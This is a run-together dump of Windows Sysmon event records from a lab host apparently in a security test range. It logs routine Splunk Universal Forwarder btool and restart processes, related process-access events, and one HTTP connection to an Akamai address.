Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-64ED-6064-D100-00000000AE01}5472C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008078Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.213{266CAFBE-64ED-6064-D100-00000000AE01}5472C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64ED-6064-D000-00000000AE01}6584C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000008077Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.197{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64ED-6064-D000-00000000AE01}6584C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008076Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.197{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008075Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.197{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008074Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.197{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008073Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.197{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008072Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.197{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64ED-6064-D000-00000000AE01}6584C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008071Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.197{266CAFBE-64ED-6064-CF00-00000000AE01}55726640C:\Windows\system32\cmd.exe{266CAFBE-64ED-6064-D000-00000000AE01}6584C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008070Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.206{266CAFBE-64ED-6064-D000-00000000AE01}6584C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-64ED-6064-CF00-00000000AE01}5572C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000008069Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.197{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64ED-6064-CF00-00000000AE01}5572C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008068Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.197{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008067Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.197{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008066Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.197{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008065Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.197{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008064Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.197{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64ED-6064-CF00-00000000AE01}5572C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008063Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.197{266CAFBE-64E9-6064-C000-00000000AE01}67366740C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{266CAFBE-64ED-6064-CF00-00000000AE01}5572C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1893f|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+17106|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1385a|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+12176|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+19082|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d94e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008062Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.201{266CAFBE-64ED-6064-CF00-00000000AE01}5572C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64E9-6064-C000-00000000AE01}6736C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2796 354300x80000000000000008233Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.995{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53597-false104.117.196.27a104-117-196-27.deploy.static.akamaitechnologies.com80http 10341000x80000000000000008232Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EE-6064-E400-00000000AE01}6464C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008231Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008230Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008229Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008228Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64EE-6064-E400-00000000AE01}6464C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008227Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008226Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-64EE-6064-E300-00000000AE01}63246328C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-64EE-6064-E400-00000000AE01}6464C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008225Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.753{266CAFBE-64EE-6064-E400-00000000AE01}6464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64EE-6064-E300-00000000AE01}6324C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list kvstore --no-log 10341000x80000000000000008224Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EE-6064-E300-00000000AE01}6324C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008223Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008222Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008221Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 